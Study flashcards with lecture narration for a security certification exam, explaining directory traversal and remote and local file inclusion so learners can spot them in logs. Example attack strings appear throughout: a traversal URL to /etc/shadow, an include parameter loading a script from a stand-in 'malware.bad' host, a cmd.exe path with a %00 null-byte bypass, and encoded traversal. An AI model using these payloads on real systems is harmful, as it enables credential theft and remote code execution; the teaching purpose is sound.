Section 19.180 Directory Traversal Attack Flashcards
Objective 2.4 Given a scenario, you must be able to analyse indicators of malicious activity
Directory Traversal Attack
An injection attack occurs when the attacker inserts malicious code through an application interface
■ Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory
below entries an attacker may use to get the files
●http://diontraining.com/../../../../etc/shadow
● Unix systems use . . /
● Windows systems use . . \ by default but may also accept the Unix-like . . /
■ Directory traversals may be used to access any file on a system with the right permissions
WARNING
■ Attackers may use encoding to hide directory traversal attempts (%2e%2e%2frepresents . . / )
f you’re running a web server, you’re running this on Windows or Mac or Linux or Unix or some kind of operating system and there’s going to be a folder in there that is called the web document root. Essentially that folder is where,
when you go to diontraining.com, it goes to find those files. Now that isn’t the root of your hard drive, it’s just the root of that directory
but there’s many folders above that. And so if I went to something like
diontraining.com/../../../../etc/shadow,
that would try to go and find that shadow file.
Now, that shadow file isn’t inside the web root though. Instead, it’s located on some other file
off of the directory. And so what we’re doing here with that ../../../../, is doing a directory traversal.
File Inclusion
Web application vulnerability that allows an attacker either to download a file
from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor
File Inclusion - 2 different flavours
1 Remote File Inclusion
An attacker executes a script to inject a remote file into the web app or website
○ https://diontraining.com/login.php?
○user=http://malware.bad/malicious.php
So if I use something like https://diontraining.com/login.php,
that part is fine. Then I have ?user=, this is passing the parameter of which user I want to log in as.
Now, what user am I going to log into? Am I going to log in as Jason? No, we’re going to log in as,
http://malware.bad/malicious.php. So what we’re doing is we’re passing this parameter and when our system executes and tries to find that parameter to load it into our database, instead, we’re going to load in this malicious script. So this is the idea of a remote file inclusion. We’re including this remote file, malicious.php from this other website into my web server using this type of command.
File Inclusion - 2 different flavours
2 Local File Inclusion
An attacker adds a file to the web app or website that already exists on the hosting server
○ https://diontraining.com/login.php
○ user= ../../Windows/system32/cmd.exe%00
■ Logs containing ../ pertain to directory traversals
○ To prevent directory traversals and file inclusion attacks, use proper input validation
So let’s say on my website, we might allow you to upload something like a picture or a PDF or other files, as part of our community forum. Well, then you could reference that file because it’s already sitting on my server. So in this case, you would do something like, https://diontraining.com/login.php?user=,
and now here you see this directory traversal,
../../Windows/system32/cmd.exe%00. Now, what are they trying to do? This is assuming that I have a Windows server, and they’re trying to go up to directories, into the Windows directory, down into System32, and run the command shell. This way, they can run any program they want that executes in DOS or Windows. Now what is that %00 at the end? Well, that’s a common tactic that’s used
to insert a null character at the end of your URL. That %00 in URL encoding, is essentially a null character. And so this is being used to request
to bypass the security mechanisms, that would normally add a .php to the end of the request
and instead allow us to use that .exe extension.
Exam tip
Anytime you see something with ../, I want you to think directory traversal. This is what the answer is most likely going to be.
Now, the reason for this is because on the exam, they’re going to bring up the idea of directory traversal a lot. Now you might also get some questions about local file inclusions. And if that’s the case, that is a type of directory traversal. Now, if you get a question like this on the exam, you’re not going to have answer choices A, B, C and D, where A is directory traversal, and B is local file inclusion. They won’t do that to you. Instead, you’re going to have, on this question directory traversal, on another one, you might have local file inclusion. So if you see ../, it’s one of those two things. Now, when you’re on the exam, you’re going to be asked to look at logs and things like proxy servers. And as you’re looking through the proxy server logs, you’re going to see these different URLs inside those logs. And as you look at them, anytime you see that ../, I want you to remember that is directory traversal and that’ll be the right answer for you on the exam.
